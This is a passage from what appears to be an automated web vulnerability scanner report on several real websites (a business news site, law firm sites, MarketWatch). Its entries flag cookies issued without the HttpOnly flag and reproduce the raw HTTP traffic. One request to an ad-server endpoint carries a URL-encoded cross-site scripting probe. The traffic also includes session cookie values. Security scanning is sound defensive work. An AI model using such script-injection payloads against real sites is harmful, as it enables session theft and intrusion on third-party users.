Set-Cookie: OAID=30fd5f0f23a90b1cf3e911d684cc4aba; expires=Sat, 12-May-2012 00:42:50 GMT; path=/
P3P: CP="NOI CUR ADM OUR NOR STA NID"
Content-Length: 1240
Connection: close
Content-Type: text/javascript; charset=UTF-8

var OX_348a644b = '';
OX_348a644b += "<"+"a href=\'http://www.hartfordbusiness.com/phpAds/www/delivery/ck.php?oaparams=2__bannerid=445__zoneid=12__cb=9391fe37fd__oadest=http://www.tempsnow.jobs/About.
...[SNIP]...
18.126. http://www.hartfordbusiness.com/phpAds/www/delivery/lg.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hartfordbusiness.com
Path:   /phpAds/www/delivery/lg.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /phpAds/www/delivery/lg.php?bannerid=445&campaignid=138&zoneid=12&channel_ids=,&loc=http%3A%2F%2Fwww.hartfordbusiness.com%2Fnews14300.html8d3ba%22%3E%3Cscript%3Ealert%28%22GHDB%22%29%3C%2Fscript%3E22db1e31600&referer=http%3A%2F%2Fburp%2Fshow%2F17&cb=44a592314b HTTP/1.1
Host: www.hartfordbusiness.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hartfordbusiness.com/news14300.html8d3ba%22%3E%3Cscript%3Ealert(%22GHDB%22)%3C/script%3E22db1e31600
Cookie: PHPSESSID=cba35d48e37d667e2a7b4af26a795cdd; __utma=231841670.1564481969.1305247369.1305247369.1305247369.1; __utmb=231841670.1.10.1305247369; __utmc=231841670; __utmz=231841670.1305247369.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; OAID=ff33d9b426ad063f746675f34d885b06

Response

HTTP/1.1 200 OK
Date: Fri, 13 May 2011 00:42:51 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.10-2ubuntu6
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="NOI CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=ff33d9b426ad063f746675f34d885b06; expires=Sat, 12-May-2012 00:42:51 GMT; path=/
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;
18.127. http://www.howardrice.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.howardrice.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.howardrice.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Howard+Rice+Nemerovski+Canady+Falk+%26+Rabkin&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 39373
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: currentLang=en-US; path=/
Set-Cookie: ASP.NET_SessionId=pe3xaq55hraylnfzs1r5cd45; path=/; HttpOnly
Date: Thu, 12 May 2011 16:09:18 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Howard Rice
<
...[SNIP]...
18.128. http://www.howardrice.com/6862  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.howardrice.com
Path:   /6862

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /6862 HTTP/1.1
Host: www.howardrice.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.howardrice.com/
Cookie: currentLang=en-US; ASP.NET_SessionId=awerfjvfyai4kafq43zhuc45; __utma=146441517.1620441990.1305216561.1305216561.1305216561.1; __utmb=146441517.2.10.1305216561; __utmc=146441517; __utmz=146441517.1305216561.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Howard%20Rice%20Nemerovski%20Canady%20Falk%20%26%20Rabkin; __utmv=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33063
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: currentLang=en-US; path=/
Date: Thu, 12 May 2011 16:12:26 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...
18.129. http://www.howardrice.com/Alumni  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.howardrice.com
Path:   /Alumni

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Alumni HTTP/1.1
Host: www.howardrice.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.howardrice.com/
Cookie: currentLang=en-US; ASP.NET_SessionId=awerfjvfyai4kafq43zhuc45; __utma=146441517.1620441990.1305216561.1305216561.1305216561.1; __utmb=146441517.3.10.1305216561; __utmc=146441517; __utmz=146441517.1305216561.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Howard%20Rice%20Nemerovski%20Canady%20Falk%20%26%20Rabkin; __utmv=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 32212
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: currentLang=en-US; path=/
Date: Thu, 12 May 2011 16:13:30 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...
18.130. http://www.howardrice.com/Events  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.howardrice.com
Path:   /Events

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Events HTTP/1.1
Host: www.howardrice.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.howardrice.com/
Cookie: currentLang=en-US; ASP.NET_SessionId=awerfjvfyai4kafq43zhuc45; __utma=146441517.1620441990.1305216561.1305216561.1305216561.1; __utmb=146441517.1.10.1305216561; __utmc=146441517; __utmz=146441517.1305216561.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Howard%20Rice%20Nemerovski%20Canady%20Falk%20%26%20Rabkin

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 114611
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: currentLang=en-US; path=/
Date: Thu, 12 May 2011 16:12:15 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...
18.131. http://www.howardrice.com/WebResource.axd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.howardrice.com
Path:   /WebResource.axd

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /WebResource.axd?d=RRsAN9kWFenNpJcwRVXIEVPB9Qr_oP8XBfMoW4bxSreao0z0E_955VHZEhXQSASO_Uqx42U_aWu9BxlA8AcChEZ899g1&t=634385131066611250 HTTP/1.1
Host: www.howardrice.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.howardrice.com/
Cookie: currentLang=en-US; ASP.NET_SessionId=awerfjvfyai4kafq43zhuc45

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 20794
Content-Type: application/x-javascript
Expires: Fri, 11 May 2012 16:09:22 GMT
Last-Modified: Sat, 16 Apr 2011 05:11:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: currentLang=en-US; path=/
Date: Thu, 12 May 2011 16:09:21 GMT

function WebForm_PostBackOptions(eventTarget, eventArgument, validation, validationGroup, actionUrl, trackFocus, clientSubmit) {
this.eventTarget = eventTarget;
this.eventArgument = eventArg
...[SNIP]...
18.132. http://www.howardrice.com/showlandingpage.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.howardrice.com
Path:   /showlandingpage.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /showlandingpage.aspx HTTP/1.1
Host: www.howardrice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=146441517.1305216561.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Howard%20Rice%20Nemerovski%20Canady%20Falk%20%26%20Rabkin; __utma=146441517.1620441990.1305216561.1305216561.1305216561.1; __utmc=146441517; __utmb=146441517.4.10.1305216561; ASP.NET_SessionId=awerfjvfyai4kafq43zhuc45; currentLang=en-US;

Response

HTTP/1.1 302 Found
Connection: close
Date: Thu, 12 May 2011 16:55:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /index.aspx
Set-Cookie: currentLang=en-US; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 130

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2findex.aspx">here</a>.</h2>
</body></html>
18.133. http://www.marketwatch.com/news/story/therese-polettis-tech-tales-ebay/story.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marketwatch.com
Path:   /news/story/therese-polettis-tech-tales-ebay/story.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news/story/therese-polettis-tech-tales-ebay/story.aspx HTTP/1.1
Host: www.marketwatch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: mw5_ads=seen=16; domain=.marketwatch.com; expires=Fri, 13-May-2011 04:59:59 GMT; path=/
X-Powered-By: ASP.NET
X-MACHINE: sbkdfpswebp04
Date: Thu, 12 May 2011 16:55:26 GMT
Content-Length: 47848

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
18.134. http://www.moritthock.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moritthock.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.moritthock.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Moritt+Hock+Hamroff+%26+Horowitz&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cookie: exp_last_visit=989860893; exp_last_activity=1305221465; __utma=175020734.1039693598.1305202900.1305202900.1305202900.1; __utmz=175020734.1305202900.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Moritt%20Hock%20Hamroff%20%26%20Horowitz
If-Modified-Since: Thu, 12 May 2011 12:21:34 GMT

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:09:32 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: exp_last_visit=1305221465; expires=Fri, 11-May-2012 16:09:32 GMT; path=/
Set-Cookie: exp_last_activity=1305234572; expires=Fri, 11-May-2012 16:09:32 GMT; path=/
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 12 May 2011 16:09:32 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 59262


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>Moritt Hock & Hamroff LLP A
...[SNIP]...
18.135. http://www.moritthock.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moritthock.com
Path:   /index.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /index.php HTTP/1.1
Host: www.moritthock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=175020734.1305216575.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Moritt%20Hock%20Hamroff%20%26%20Horowitz; __utma=175020734.1039693598.1305202900.1305202900.1305216575.2; exp_last_visit=1305221465; __utmc=175020734; exp_last_activity=1305236919; __utmb=175020734.1.10.1305216575; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:55:39 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: exp_last_activity=1305237339; expires=Fri, 11-May-2012 16:55:39 GMT; path=/
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 12 May 2011 16:55:40 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Connection: close
Content-Length: 59262


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>Moritt Hock & Hamroff LLP A
...[SNIP]...
18.136. http://www.moritthock.com/index.php/attorneys  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moritthock.com
Path:   /index.php/attorneys

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /index.php/attorneys HTTP/1.1
Host: www.moritthock.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.moritthock.com/index.php/news_events/television_media
Cookie: exp_last_visit=1305221465; exp_last_activity=1305237459; __utma=175020734.1039693598.1305202900.1305216575.1305218923.3; __utmz=175020734.1305216575.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Moritt%20Hock%20Hamroff%20%26%20Horowitz; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fnews_events%2Ftelevision_media%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utmc=175020734

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 17:57:32 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: exp_last_activity=1305241052; expires=Fri, 11-May-2012 17:57:32 GMT; path=/
Set-Cookie: exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A11%3A%22%2Fattorneys%2F%22%3Bi%3A1%3Bs%3A30%3A%22%2Fnews_events%2Ftelevision_media%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 12 May 2011 17:57:32 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 59839


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<title>Attorneys | Moritt Hock & H
...[SNIP]...
18.137. http://www.moritthock.com/index.php/attorneys/attorney/terese_l_arenth  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moritthock.com
Path:   /index.php/attorneys/attorney/terese_l_arenth

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /index.php/attorneys/attorney/terese_l_arenth HTTP/1.1
Host: www.moritthock.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.moritthock.com/index.php/attorneys
Cookie: exp_last_visit=1305221465; exp_last_activity=1305241051; __utma=175020734.1039693598.1305202900.1305218923.1305223056.4; __utmz=175020734.1305216575.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Moritt%20Hock%20Hamroff%20%26%20Horowitz; exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A11%3A%22%2Fattorneys%2F%22%3Bi%3A1%3Bs%3A30%3A%22%2Fnews_events%2Ftelevision_media%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3B%7D; __utmc=175020734; __utmb=175020734.1.10.1305223056

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 17:57:42 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: exp_last_activity=1305241062; expires=Fri, 11-May-2012 17:57:42 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A36%3A%22%2Fattorneys%2Fattorney%2Fterese_l_arenth%2F%22%3Bi%3A1%3Bs%3A11%3A%22%2Fattorneys%2F%22%3Bi%3A2%3Bs%3A30%3A%22%2Fnews_events%2Ftelevision_media%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 12 May 2011 17:57:43 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 19697


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>Terese L. Arenth | Moritt Hoc
...[SNIP]...
18.138. http://www.moritthock.com/index.php/news_events/announcement/joshua_b._summers_elected_to_board_of_directors_of_the_jcc_of_the_greater_f  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moritthock.com
Path:   /index.php/news_events/announcement/joshua_b._summers_elected_to_board_of_directors_of_the_jcc_of_the_greater_f

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.php/news_events/announcement/joshua_b._summers_elected_to_board_of_directors_of_the_jcc_of_the_greater_f HTTP/1.1
Host: www.moritthock.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.moritthock.com/
Cookie: exp_last_visit=1305221465; exp_last_activity=1305234570; __utma=175020734.1039693598.1305202900.1305202900.1305216575.2; __utmz=175020734.1305216575.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Moritt%20Hock%20Hamroff%20%26%20Horowitz; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; __utmc=175020734

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:48:39 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: exp_last_activity=1305236919; expires=Fri, 11-May-2012 16:48:39 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 12 May 2011 16:48:39 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 11333


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>Moritt Hock & Hamroff Attorn
...[SNIP]...
18.139. http://www.moritthock.com/index.php/news_events/press_releases  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moritthock.com
Path:   /index.php/news_events/press_releases

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /index.php/news_events/press_releases HTTP/1.1
Host: www.moritthock.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.moritthock.com/index.php/news_events/announcement/joshua_b._summers_elected_to_board_of_directors_of_the_jcc_of_the_greater_f
Cookie: exp_last_visit=1305221465; exp_last_activity=1305236919; __utma=175020734.1039693598.1305202900.1305216575.1305218923.3; __utmz=175020734.1305216575.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Moritt%20Hock%20Hamroff%20%26%20Horowitz; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; __utmc=175020734; __utmb=175020734.1.10.1305218923

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:57:39 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: exp_last_activity=1305237459; expires=Fri, 11-May-2012 16:57:39 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A28%3A%22%2Fnews_events%2Fpress_releases%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 12 May 2011 16:57:40 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 27396


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>Press Releases | Moritt Hoc
...[SNIP]...
18.140. http://www.moritthock.com/index.php/news_events/television_media  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moritthock.com
Path:   /index.php/news_events/television_media

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /index.php/news_events/television_media HTTP/1.1
Host: www.moritthock.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.moritthock.com/index.php/news_events/announcement/joshua_b._summers_elected_to_board_of_directors_of_the_jcc_of_the_greater_f
Cookie: exp_last_visit=1305221465; exp_last_activity=1305236919; __utma=175020734.1039693598.1305202900.1305216575.1305218923.3; __utmz=175020734.1305216575.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Moritt%20Hock%20Hamroff%20%26%20Horowitz; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; __utmc=175020734; __utmb=175020734.1.10.1305218923

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:57:41 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Set-Cookie: exp_last_activity=1305237461; expires=Fri, 11-May-2012 16:57:41 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fnews_events%2Ftelevision_media%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 12 May 2011 16:57:44 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 16817


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>Television Media</title>
<me
...[SNIP]...
18.141. http://www.moritthock.com/index.php/practice_areas  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moritthock.com
Path:   /index.php/practice_areas

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /index.php/practice_areas HTTP/1.1
Host: www.moritthock.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
